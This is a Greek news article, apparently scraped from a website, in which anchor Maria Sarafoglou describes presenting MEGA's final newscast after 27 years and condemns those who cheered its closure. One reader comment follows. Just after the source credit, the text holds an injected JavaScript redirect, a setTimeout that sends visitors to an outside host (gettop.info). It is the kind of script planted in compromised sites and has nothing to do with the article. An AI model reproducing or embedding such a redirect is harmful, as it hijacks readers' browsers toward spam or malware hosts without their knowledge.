Μαρία Σαράφογλου για το τελευταίο δελτίο του MEGA: Ένιωσα ένα κενό στο στομάχι μου…

1
60

 

Συνέντευξη στο Down Town έδωσε η Μαρία Σαράφογλου στην οποία ανατέθηκε ο δύσκολος ρόλος να παρουσιάσει το τελευταίο δελτίο του Mega έπειτα από 27 χρόνια.

Η anchor woman περιγράφει τα συναισθήματα της, όταν έμαθε ότι θα έλεγε τις ειδήσεις του ΜΕGA για τελευταία φορά έπειτα από 27 χρόνια.

Όπως αποκαλύπτει: «Εκείνη την ημέρα, αν και όλοι υποψιαζόμασταν ότι θα είναι το τελευταίο δελτίο του σταθμού, κανείς δεν μπορούσε να το αποδεχθεί. Ούτε εγώ ήθελα να το πιστέψω. Μια ιστορία 27 ετών σε ένα κορυφαίο κανάλι, ναυαρχίδα της ενημέρωσης, δεν σβήνει ξαφνικά ένα μεσημέρι. Το πρωί, λοιπόν, όταν μου είπαν οι συνάδελφοι -στο εξωτερικό δελτίο όπου καθόμασταν- ότι επιδόθηκαν οι επισχέσεις εργασίας και μάλλον θα παρουσιάσουμε τελευταίο δελτίο, ένιωσα ένα κενό στο στομάχι μου και δάκρυσα«.

Επίσης, απαντά σε όσους έδειξαν να χαίρονται με το κλείσιμο του Mega: «Είναι ασύλληπτο το μίσος που καλλιεργήθηκε και διοχετεύτηκε για το Mega. Αν διαφωνείς με την ενημέρωση που προσφέρει ένα μέσο, αλλάζεις κανάλι, δεν πανηγυρίζεις όταν κλείνει και μένουν στον δρόμο περισσότερες από 500 οικογένειες. Αυτός ο ρεβανσισμός που ξεχειλίζει στα ανώνυμα σχόλια του διαδικτύου είναι ντροπιαστικός. Δυστυχώς η κρίση, αντί να ενώσει, δίχασε, και τροφοδότησε τον κανιβαλισμό σε όλα τα επίπεδα. Ευτυχώς, όμως, κατέρριψε και πολλούς μύθους που έντυναν βολικά κάποια πολιτικά επιχειρήματα«.

Πηγή: followme.gr setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

1 ΣΧΟΛΙΟ

  1. Εγω θέλω να πώ ήσυχα και απλά ότι και οι πρώτοι έρχονται τελευταίοι άν δεν προσέξουν. Τι θα πεί 27 ή 37 χρόνια ζωής. Δεν μπορεί τα κέρδη να τα βάζουν στην τσ΄ρπη τους και τις ζημιές να θέλουν να τις πληρώσουν οι άλλοι δηλαδή εμείς. Κάποτε στη Γερμανία μεσουρανούσε η GRUNDIG. Εε μετά από 150 χρόνια πτώχευσε και έκλεισε. Σήμερα δεν υπάρχει.

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here